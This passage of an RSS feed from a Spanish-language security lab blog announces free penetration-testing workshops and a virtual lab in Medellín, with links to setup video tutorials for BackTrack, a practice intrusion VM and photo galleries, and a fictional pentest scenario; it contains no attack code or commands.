			<content:encoded><![CDATA[<p>Al igual que la sesión anterior, esta muestra como llevar a cabo el proceso de configuración del entorno virtualizado de intrusión bajo Linux y VMWare WorkStation.</p>
<p>En el siguiente video tutorial veremos como crear una nueva maquina virtual en VMWare WorkStation, como confirgurarla para que trabaje como el entorno virtualizado de intrusión objeto de estudio de estos Laboratorios Virtuales y como acceder a las intrucciones de desarrollo del mismo, utilizando como cliente BackTrack.</p>
<p><embed src="http://blip.tv/play/Ae3iAZSMLg" type="application/x-shockwave-flash" width="530" height="400" allowscriptaccess="always" allowfullscreen="true"></embed> </p>
<p><strong><a href="http://www.4shared.com/file/80821521/efcabf57/config_labVirtualLinux_LabsDragonJARorg.html ">Descargar video tutorial de configuración del entorno virtualizado de intrusión en Linux</a></strong> (<strong>Password:</strong> www.dragonjar.org) &#8211; <strong>formato del video:</strong> .ogg</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion-en-linux/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Configuración de los ambientes virtuales de intrusión</title>
		<link>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion</link>
		<comments>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion#comments</comments>
		<pubDate>Wed, 14 Jan 2009 22:48:08 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Máquinas Virtuales]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[virtualización]]></category>
		<category><![CDATA[VMWare]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=510</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p>Una vez concluída la introducción y luego de dejar claro algunos conceptos podemos comenzar con la configuración de los ambientes virtuales de intrusión.</p>
<div align="center"><img alt="" src="http://img413.imageshack.us/img413/529/penetrationmb0.jpg" title="PenTesting" class="aligncenter" width="450" height="300" /></div>
<p>En el siguiente video tutorial profundizo un poco más sobre el proyecto de LiveCD&#8217;s como herramientas de prácticas de Test de Intrusión; Desarrollo original de Thomas Wilhem (<strong><a href="http://heorot.net/livecds/">De-ICE.net PenTest LiveCDs Project</a></strong>).<br />
Además muestro el proceso de configuración y ejecución de los entornos virtuales de intrusión sobre VMWare WorkStation y Qemu.</p>
<p>En los próximos video tutoriales mostraré como llevar a cabo el montaje de estos entornos bajo ambientes Linux y el desarrollo del propio Test de Penetración desde BackTrack.</p>
<p><embed src="http://blip.tv/play/Ae3hRZSMLg" type="application/x-shockwave-flash" width="530" height="400" allowscriptaccess="always" allowfullscreen="true"></embed> </p>
<p><strong><a href="http://www.4shared.com/file/80657868/57e3b318/Pentest2_LabsDragonJARorg.html ">Descargar video tutorial de configuración de los ambientes virtuales de intrusión</a></strong> (<strong>Password:</strong> www.dragonjar.org)</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion/feed</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>Desarrollo del Laboratorio Virtual &#8211; Test de Penetración 1</title>
		<link>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-1</link>
		<comments>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-1#comments</comments>
		<pubDate>Wed, 14 Jan 2009 08:40:43 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Entorno Virtualizado de Intrusión]]></category>
		<category><![CDATA[Hack Lab]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Máquinas Virtuales]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=494</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p>El siguiente video tutorial hace la introducción y resumen de los laboratorios realizados en modo presencial y virtual referentes a Test de Penetración, Hacking: Técnicas y Contramedidas, Web Application PenTest e Informática Forense.</p>
<p align="center"><img alt="" src="http://img299.imageshack.us/img299/2074/pentestlu0.jpg" title="PenTest" class="aligncenter" width="450" height="332" /></p>
<p>La presentación no busca recrear por completo los temas tratados en cada uno de estos laboratorios, en lugar de ello presenta los apartes más importantes de los mismos, tratando de profundizar mucho más en los aspectos prácticos y técnicos.</p>
<p><span id="more-494"></span></p>
<p>Se hace necesario aclarar que en este video tutorial se presentan algunos conceptos a manera muy general, sin llegar al detalle como se ha hecho en cada una de las sesiones presenciales y virtuales, pues este solo busca nivelar y resumir sobre las sesiones realizadas a las personas que por diferentes razones no han podido estar presentes en estos, además de invitar a la comunidad e interesados a participar en los próximos.</p>
<p>La siguiente es la agenda a cubrir en la sesión:</p>
<p>- ¿Quiénes somos?<br />
- Conceptos básicos sobre Seguridad Informática / Test de Penetración<br />
- Estado actual de los Laboratorios de Seguridad Informática<br />
- ¿Qué son los Laboratorios de Seguridad Informática Labs.DragonJAR.org?<br />
- Laboratorios realizados<br />
- Objetivo del Laboratorio<br />
- Contenido del Laboratorio<br />
- Materiales necesarios para desarrollar el Laboratorio<br />
- Desarrollo del Laboratorio<br />
- Conclusiones</p>
<p>Este video tutorial llega hasta la presentación y resumen de los laboratorios realizados hasta la fecha, definición de aspectos básicos la seguridad de la información/Test de Penetración e introducción en el ambiente virtualizado a desarrollar.</p>
<p>En los próximos veremos como podemos llevar a cabo el proceso de configuración y desarrollo del Test de Penetración.</p>
<p><embed src="http://blip.tv/play/Ae3dKZSMLg" type="application/x-shockwave-flash" width="530" height="400" allowscriptaccess="always" allowfullscreen="true"></embed> </p>
<p><a href="http://www.4shared.com/file/80554284/59608a2b/PenTest1_LabsDragonJARorg.html">Descargar video tutorial de presentación e introducción en el Laboratorio de Test de Penetración</a></strong> (<strong>Password:</strong> www.dragonjar.org)</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-1/feed</wfw:commentRss>
		<slash:comments>12</slash:comments>
		</item>
		<item>
		<title>Laboratorio Virtual: Test de Penetración 1 (Introducción y Desarrollo)</title>
		<link>http://labs.dragonjar.org/laboratorio-virtual-test-de-penetracion-1-introduccion-y-desarrollo</link>
		<comments>http://labs.dragonjar.org/laboratorio-virtual-test-de-penetracion-1-introduccion-y-desarrollo#comments</comments>
		<pubDate>Thu, 18 Dec 2008 20:38:43 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Entorno Virtualizado de Intrusión]]></category>
		<category><![CDATA[Hack Lab]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Máquinas Virtuales]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=488</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">&#8220;Hace días venía madurando la posibilidad de ofrecer los mismos laboratorios que vengo desarrollando en la ciudad de Medellín pero en modo virtual:<br />
<a href="http://anonym-url.com/go.php?to=http://labs.dragonjar.org/desarrollo-del-laboratorio-de-informatica-forense-en-medellin" target="_blank"><strong>Desarrollo del Laboratorio de Informática Forense en Medellín</strong></a><br />
<a href="http://anonym-url.com/go.php?to=http://labs.dragonjar.org/desarrollo-del-hacktaller-05-medellin-fotografias" target="_blank"><strong>Desarrollo del HackTaller 05 Medellín &#8211; Fotografías</strong></a><br />
<a href="http://anonym-url.com/go.php?to=http://labs.dragonjar.org/desarrollo-del-hacktaller-06-en-medellin-fotografias-y-escenario-propuesto" target="_blank"><strong>Desarrollo del HackTaller 06 en Medellín &#8211; Fotografías y Escenario propuesto</strong></a>&#8221;</p>
<p style="text-align: justify;">Este será llevado a cabo el próximo sabado 20 de diciembre &#8211; 2:00 PM To 4:00 PM (GMT-05:00) Eastern Time (US &amp; Canada)</p>
<p>Los interesados deben enviarme un correo electrónico, al cual yo responderé con el enlace al salón virtual.</p>
<p>4v4t4r @ gmail . com</p>
<p style="text-align: justify;"><span id="more-488"></span>La temática para este primer laboratorio virtual es la siguiente:</p>
<p><strong>Test de Penetración 1 (Introducción y Desarrollo)</strong></p>
<p>La finalidad de este primer Laboratorio virtual de Test de Penetración, será el ofrecer las técnicas, procesos y procedimientos necesarios para llevar a cabo un Test de Penetración haciendo uso de la Multi-Herramienta BackTrack.</p>
<p>Esto conllevará entonces a aprender y prácticar con ejemplos claros, sobre el uso de esta máginifica distribución. Además de las metodologías necesarias en un Test de Penetración.</p>
<p><strong>Escenario propuesto:</strong></p>
<p>El escenario para este Laboratorio es el de un CEO de una pequeña empresa que ha sido presionado por el Comité Administrativo para ser objeto de un Test de Penetración a realizarse desde la empresa. El Director General afirma que su empresa es segura, cree además de que este Test de Penetración será un enorme desperdicio de dinero, sobre todo porque ya tiene una solución de exploración (escaneo) de vulnerabilidades (Nessus). Para hacer “felices” a los del Comité Administrativo, él decide contratarlo a usted y le dá un plazo de 5 días para realizar el trabajo, pues como se mencionó él no cree que la empresa sea vulnerable a cualquier intento de acceso no autorizado.<br />
Su tarea es analizar solo un servidor en el cual se aloja una página Web que ofrece información de contacto de la misma.</p>
<p>El Director General espera que usted intente con todos los tipos de ataques que estén a su disposición, pues está seguro de que usted no podrá vulnerar el sistema y obtener acceso.<br />
Demostrar que el sistema es vulnerable sería la mejor manera de concientizar al Director General, para desde allí implementar mejores prácticas en materia de seguridad Informática.<br />
&#8212;&#8212;&#8212;-</p>
<p>De esta manera hago la invitación a todos los interesados en participar. No existe entonces la limitación geográfica que muchos usuarios presentan <img src="http://comunidad.dragonjar.org/Smileys/default/smiley.gif" border="0" alt="Sonrisa" />.</p>
<p style="text-align: justify;">Por ahora y como vieron en la descripción se hace necesario tener la distribución BackTrack.</p>
<p>La idea entonces es que descarguen la imágen y la configuren en una máquina virtual (VMWare Player / WorkStation / Server).<br />
Como sugerencia personal preferiría que descargaran la siguiente máquina virtual ya creada, con las vmware tools instaladas y lista para ser usada.</p>
<p><a href="http://anonym-url.com/go.php?to=http://174.36.1.2/bt3.7z" target="_blank"><strong>Descargar Máquina Virtual BackTrack 3</strong></a> (Desarrollada por <a href="http://anonym-url.com/go.php?to=http://bagside.com/bagvapp/index.html" target="_blank"><strong>Bagside</strong></a>)</p>
<p style="text-align: justify;">Ahora publico el sistema que será objeto del Test de Penetración.</p>
<p><a href="http://anonym-url.com/go.php?to=http://www.sendspace.com/file/hglz1o" target="_blank"><strong>Descargar imágen de Entorno Virtualizado de Intrusion +/- 195Mb</strong></a></p>
<p>La idea es que vayan leyendo los enlaces que publiqué anteriormente, además pueden ir descomprimiendo la máquina virtual BackTrack (+/- 1.5Gb).<br />
Recuerden además que este laboratorio será desarrollado en cualquiera de los productos VMWare (WorkStation, Player, Server), aunque de todas maneras mostraré como puede configurarse en Qemu. Así que por lo tanto deben tener instalado cualquiera de esos productos (preferiblemente VMWare WorkStation).</p>
<p>El laboratorio promete, así que espero no se lo pierdan, mucho menos las personas de otras ciudades y paises que han querido participar en los Hack Labs que realizo en mi ciudad.</p>
<p>Para ese día deben tener un buen sistema de sonido (ej. diadema o audífonos, para poder recepcionar bien el audio).<br />
Espero además que tengan una buena conexión a internet, pues algunos recursos así lo requieren.</p>
<p>Aún sigo esperando los correos electrónicos de las personas que estén interesadas, hasta el momento solo he recibido 8 correos, y solo puede ser transmitida la invitación por ese medio.<br />
De la buena asistencia depende de que continúe o no con la realización y publicación de los mismos <img src="http://comunidad.dragonjar.org/Smileys/default/wink.gif" border="0" alt="Gi&amp;ntilde;ar" /></p>
<p><strong>Textos e información de interés:</strong></p>
<p><a href="../descubrimiento-de-aplicaciones-nmap" target="_blank">http://labs.dragonjar.org/descubrimiento-de-aplicaciones-nmap</a><br />
<a href="../video-tutorial-de-instalacion-de-backtrack-3" target="_blank">http://labs.dragonjar.org/video-tutorial-de-instalacion-de-backtrack-3</a><br />
<a href="../test-de-penetracion-con-backtrack-netcat" target="_blank">http://labs.dragonjar.org/test-de-penetracion-con-backtrack-netcat</a><br />
<a href="../test-de-penetracion-con-backtrack-servicios-basicos" target="_blank">http://labs.dragonjar.org/test-de-penetracion-con-backtrack-servicios-basicos</a><br />
<a href="../test-de-penetracion-con-backtrack-conceptos-basicos" target="_blank">http://labs.dragonjar.org/test-de-penetracion-con-backtrack-conceptos-basicos</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-identificacion-de-banner%e2%80%99s-banderas-i" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-identificacion-de-banner%e2%80%99s-banderas-i</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-identificacion-de-banner%e2%80%99s-banderas-ii" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-identificacion-de-banner%e2%80%99s-banderas-ii</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-enumeracion-del-objetivo-ii" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-enumeracion-del-objetivo-ii</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-scanning-i" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-scanning-i</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-scanning-ii" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-scanning-ii</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-scanning-iii" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-scanning-iii</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-i" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-i</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-iii" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-iii</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-v" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-v</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-vi" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-vi</a></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/laboratorio-virtual-test-de-penetracion-1-introduccion-y-desarrollo/feed</wfw:commentRss>
		<slash:comments>28</slash:comments>
		</item>
		<item>
		<title>Desarrollo del HackTaller 06 en Medellín &#8211; Fotografías y Escenario propuesto</title>
		<link>http://labs.dragonjar.org/desarrollo-del-hacktaller-06-en-medellin-fotografias-y-escenario-propuesto</link>
		<comments>http://labs.dragonjar.org/desarrollo-del-hacktaller-06-en-medellin-fotografias-y-escenario-propuesto#comments</comments>
		<pubDate>Sun, 30 Nov 2008 04:03:24 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Laboratorio de seguridad informática]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=409</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Muchas gracias nuevamente a todas las personas que asistieron a este Hack Taller 06 en la ciudad de Medellín.</p>
<p style="text-align: center;"><img class="aligncenter" title="Hack Taller 06" src="http://img78.imageshack.us/img78/8270/hacktaller06xb2.jpg" alt="" width="450" height="296" /></p>
<p style="text-align: center;">
<p style="text-align: justify;">Creo que se ha cumplido este primer objetivo de comenzar a crear los grupos de estudio para estos laboratarios, se han nivelado conceptos relacionados con la <a href="http://es.wikipedia.org/wiki/Seguridad_de_la_informaci%C3%B3n" target="_blank"><strong>seguridad de la información</strong></a>, y se ha hecho un primer contacto a las personas con un <a href="http://elladodelmal.blogspot.com/2007/02/test-de-intrusion-i-de-vi.html" target="_blank"><strong>Test de Penetración</strong></a>.</p>
<p style="text-align: justify;">Este Hack Taller 06 fué una repetición del anterior, pues como mencioné, todas las personas que estaban interesadas en asistir no pudieron hacerlo por falta de cupos, el objetivo entonces de esta repetición era ofrecer una &#8220;oportunidad&#8221; de poder estar allí, para compartir y recibir conocimientos <img src='http://labs.dragonjar.org/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> .</p>
<p style="text-align: justify;"><span id="more-409"></span>Muchas gracias a todos y cada uno de los asistentes, como siempre especialmente a Sebas, Jhony y Jhonatan, que siempre están pendientes de los espacios.</p>
<p style="text-align: justify;">Para este Hack Taller he propuesto una metodología que consiste en una primera sección donde hago una exposición de <a href="http://labs.dragonjar.org/category/hacking" target="_blank"><strong>conceptos, técnicas y tácticas</strong></a> sobre seguridad informática y <a href="http://labs.dragonjar.org/test-de-penetracion-con-backtrack-conceptos-basicos" target="_blank"><strong>Test de Penetración</strong></a> que serán últiles y de interés para la segunda parte donde se lleva a cabo un <a href="http://labs.dragonjar.org/test-de-penetracion-con-backtrack-conceptos-basicos" target="_blank"><strong>Test de Penetración</strong></a> a un ambiente virtualizado de intrusión.</p>
<p style="text-align: justify;">Dejo entonces el registro fotográfico y el escenario propuesto como primera entrega sobre el desarrollo del Hack Taller.</p>
<p style="text-align: justify;"><strong>Escenario Propuesto</strong></p>
<p style="text-align: justify;">El escenario para este Laboratorio es el de un <a href="http://es.wikipedia.org/wiki/Director_ejecutivo" target="_blank"><strong>CEO</strong></a> de una pequeña empresa que ha sido presionado por el Comité Administrativo para ser objeto de un <a href="http://labs.dragonjar.org/test-de-penetracion-con-backtrack-conceptos-basicos" target="_blank"><strong>Test de Penetración</strong></a> a realizarse desde la empresa. El Director General afirma que su empresa es segura, cree además de que este Test de Penetración será un enorme desperdicio de dinero, sobre todo porque ya tiene una solución de exploración (escaneo) de vulnerabilidades (<a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-iii" target="_blank"><strong>Nessus</strong></a>). Para hacer “felices” a los del Comité Administrativo, él decide contratarlo a usted y le da un plazo de 5 días para realizar el trabajo, pues como se mencionó él no cree que la empresa sea vulnerable a cualquier intento de acceso no autorizado.<br />
Su tarea es analizar solo un servidor en el cual se aloja una página Web que ofrece información de contacto de la misma.</p>
<p>El Director General espera que usted intente con todos los tipos de ataques que estén a su disposición, pues está seguro de que usted no podrá vulnerar el sistema y obtener acceso.<br />
<strong>Demostrar que el sistema es vulnerable sería la mejor manera de concientizar al Director General, para desde allí implementar mejores prácticas en materia de seguridad Informática.</strong></p>
<p style="text-align: justify;"><a href="http://www.flickr.com/photos/31597104@N06/3069999198/in/set-72157610456974372/" target="_blank"><strong>Galería Fotográfica del 6° HackTaller realizado en Medellín</strong></a><br />
<a href="http://www.flickr.com/photos/31597104@N06/sets/72157610456974372/show/with/3069999198/" target="_blank"><strong>Galería en modo presentación</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/desarrollo-del-hacktaller-06-en-medellin-fotografias-y-escenario-propuesto/feed</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>HackTaller 06 Medellín &#8211; Curso de Seguridad Informática -Repetición</title>
		<link>http://labs.dragonjar.org/hacktaller-06-medellin-curso-de-seguridad-informatica-repeticion</link>
		<comments>http://labs.dragonjar.org/hacktaller-06-medellin-curso-de-seguridad-informatica-repeticion#comments</comments>
		<pubDate>Tue, 25 Nov 2008 14:53:13 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Curso de seguridad]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Seguridad Informática]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=400</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Hago anuncio oficial del 6° HackTaller de la Comunidad DragonJAR en Medellín.<br />
Este HackTaller será una repetición del pasado HackTaller, ya que por cuestiones de espacio no se pudo tener a todos los interesados en asistir (llegué a tener más 40 solicitudes, ya se puede ir pensando en un evento nacional de la Comunidad DragonJAR ).</p>
<p>La idea entonces es hacer todo un ciclo completo de capacitación en común, donde le demos continuidad al mismo.</p>
<p><strong>HackTaller 06 Medellín &#8211; Curso de Seguridad Informática</strong><br />
<strong>Lugar:</strong> Tecnosoft &#8211; Parque Tecnológico, Boston (antiguo Colegio San José, ahora ITM de Boston) Cr 31 # 54 – 10<br />
<strong>Fecha:</strong> Sabado 29 de Noviembre<br />
<strong>Hora:</strong> 2:00 pm<br />
<strong>Asistentes:</strong> Cualquier persona interesada en aprender y compartir conocimiento<br />
Requisitos: Cuaderno de apuntes / Dispositivo de almacenamiento (Preferiblemente igual o superior a 2 gigas)<br />
<strong>Únicamente pueden asistir las personas que realicen el respectivo registro por medio electrónico (E-mail a <a href="mailto:4v4t4r@gmail.com">4v4t4r@gmail.com</a> con el nombre, el registro se lleva a cabo luego de que yo le confirme el puesto por medio de respuesta al e-mail recibido)</strong><br />
<strong>Notas aclaratorias:</strong> Estos HackTalleres <strong>NO TIENEN NINGÚN COSTO</strong><br />
Buena disposición de aprendizaje.<br />
<strong><br />
Cupos limitados, +/- 15 personas.</strong></p>
<p><strong>Repito:</strong> <span style="font-size: 13pt; line-height: 1.3em;"><strong>Solo</strong></span> pueden asistir las personas que confirmen asistencia (el proceso de confirmación consiste en que me envía la solicitud y yo le confirmo por e-mail la reserva de su cupo), Lo hago de esta manera para garantizar de que todos estén comodos y no tengan que ocupar un equipo por dos personas, o peor aún que vaya y no tenga reserva de cupo.<br />
Aclaro también y pongo a disposición sobre quienes tengan laptops personales y quieran llevarlo allá le hago el espacio y aprende con todos.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/hacktaller-06-medellin-curso-de-seguridad-informatica-repeticion/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Desarrollo del HackTaller 05 Medellín &#8211; Fotografías</title>
		<link>http://labs.dragonjar.org/desarrollo-del-hacktaller-05-medellin-fotografias</link>
		<comments>http://labs.dragonjar.org/desarrollo-del-hacktaller-05-medellin-fotografias#comments</comments>
		<pubDate>Sun, 16 Nov 2008 14:52:01 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Máquinas Virtuales]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=335</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Nuevamente muchas gracias a todos y todas las asistentes a este 5° HackTaller realizado en la ciudad de Medellín.</p>
<p style="text-align: center;"><img class="aligncenter" title="all" src="http://img356.imageshack.us/img356/6280/allar9.jpg" alt="" width="450" height="338" /></p>
<p style="text-align: justify;">En el transcurso de la semana iré publicando el ambiente virtualizado de intrusión que utilicé para esta sesión, así mismo publicaré los videos de como realizarlo (solo uno de los métodos para realizarlo, pues existen algunos más).</p>
<p style="text-align: justify;">La asistencia fue masiva, pues al completarse el registro para una persona por computador, muchos atendieron a la opción que dí, la cual consistía en que llevaran sus equipos portátiles personales.</p>
<p style="text-align: justify;"><span id="more-335"></span>Este HackTaller sirvió para entrar en contacto de una manera más práctica con la temática de la seguridad informática, más especificamente con los Test de Intrusión, concientizó a todos los asistentes sobre lo mucho que aún nos falta por aprender y que este espacio y este tipo de eventos nos permitirán mejorar , investigar y desarrollar capacidades cognoscitivas.</p>
<p style="text-align: justify;">El próximo sabado repetiré este mismo HackTaller con las personas que esten interesadas en asistir y que no alcanzaron cupo. El martes confirmo la realización del mismo.</p>
<p style="text-align: justify;">No queda nada más que agradecer a todos los asitentes, como siempre a Jhony y Sebas quienes siempre están pendientes y dispuestos a facilitarme el espacio, a los nuevos amigos del Sena, quienes se hicieron presentes y compartieron de este HackTaller (y que le dirán a fernando que les enseñe todo lo que el sabe), a los compañeros de SoftNet (quienes por amor al arte les toco sentados en el piso con sus laptops) que amablemente ofrecieron algunos dispositivos que poseen en sus trabajos.</p>
<p style="text-align: justify;">A todos los que no pudieron asistir se les extrañó, y espero que puedan hacerlo para el próximo HackTaller <img src='http://labs.dragonjar.org/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p style="text-align: justify;">Dejo a continuación el enlace de acceso al registro fotográfico del HackTaller, (<span style="text-decoration: line-through;">no quedé en ninguna foto&#8230; ando de fotografo últimamente XD creo que moriré de hambre&#8230;</span>)</p>
<h2 style="text-align: justify;"><a href="http://www.flickr.com/photos/31597104@N06/sets/72157609204085715/" target="_blank"><strong>Galería Fotográfica del 5° HackTaller realizado en Medellín</strong></a></h2>
<h2 style="text-align: justify;"><a href="http://www.flickr.com/photos/31597104@N06/sets/72157609204085715/show/" target="_blank">Galería en modo presentación</a></h2>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/desarrollo-del-hacktaller-05-medellin-fotografias/feed</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>HackTaller 05 Medellín &#8211; Curso de Seguridad Informática</title>
		<link>http://labs.dragonjar.org/hacktaller-05-medellin-curso-de-seguridad-informatica</link>
		<comments>http://labs.dragonjar.org/hacktaller-05-medellin-curso-de-seguridad-informatica#comments</comments>
		<pubDate>Mon, 10 Nov 2008 17:43:20 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Curso de seguridad]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Seguridad Informática]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=327</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Extiendo la invitación a toda la Comunidad en general para que asistan a este 5° HackTaller en la ciudad de Medellín.<br />
En el pasado HackTaller, puse en discusión y votación la elección de temas para el próximo HackTaller, en donde les ofrecí la posibilidad de escoger entre varias temáticas, entre ellas Informática Forense a sistemas Linux, Test de Penetración, Criptografía entre otros.</p>
<p style="text-align: justify;"><span id="more-327"></span>Como resultado se decidió  realizar una HackTaller en modo de curso en seguridad informática, en el cual se tratarán los diferentes temas relacionados con la seguridad de la información pero desde el principio, o como decimos algunos &#8220;Desde 0&#8243;.</p>
<p>Aún me encuentro desarrollando todo el contenido temático, pero a modo de &#8220;adelanto&#8221; les cuento que aprenderemos sobre los siguientes temas entre otros:</p>
<p><strong>-</strong> Conceptos básicos en Seguridad Informática<br />
<strong>-</strong> Seguridad en las Redes<br />
<strong>-</strong> Seguridad en el Software<br />
<strong>-</strong> Seguridad en los aplicativos Web<br />
<strong>-</strong> Test de Penetración<br />
<strong>-</strong> Normatividad y Estándares<br />
<strong>-</strong> Informática Forense<br />
<strong>-</strong> Técnicas antiforenses<br />
<strong>-</strong> Criptografía<br />
<strong>-</strong> Vitualización<br />
<strong>-</strong> Linux<br />
<strong>-</strong> Programación en C (cliente/servidor)<br />
<strong>-</strong> Programación en lenguaje ensamblador</p>
<p>La idea entonces es hacer todo un ciclo completo de capacitación en común, donde le demos continuidad al mismo.<br />
Comenzaríamos este próximo sabado 15 de noviembre, y trataría de seguirlo cada 8 o en su defecto cada 15 días, según mi disponibilidad de tiempo.</p>
<p><strong>Resumiendo:</strong><br />
<strong>HackTaller 05 Medellín &#8211; Curso de Seguridad Informática</strong><br />
<strong>Lugar: </strong>Tecnosoft &#8211; Parque Tecnológico, Boston (antiguo Colegio San José, ahora ITM de Boston) Cr 31 # 54 – 10<br />
<strong>Hora:</strong> 2:00 pm<br />
<strong>Asistentes:</strong> Cualquier persona interesada en aprender y compartir conocimiento<br />
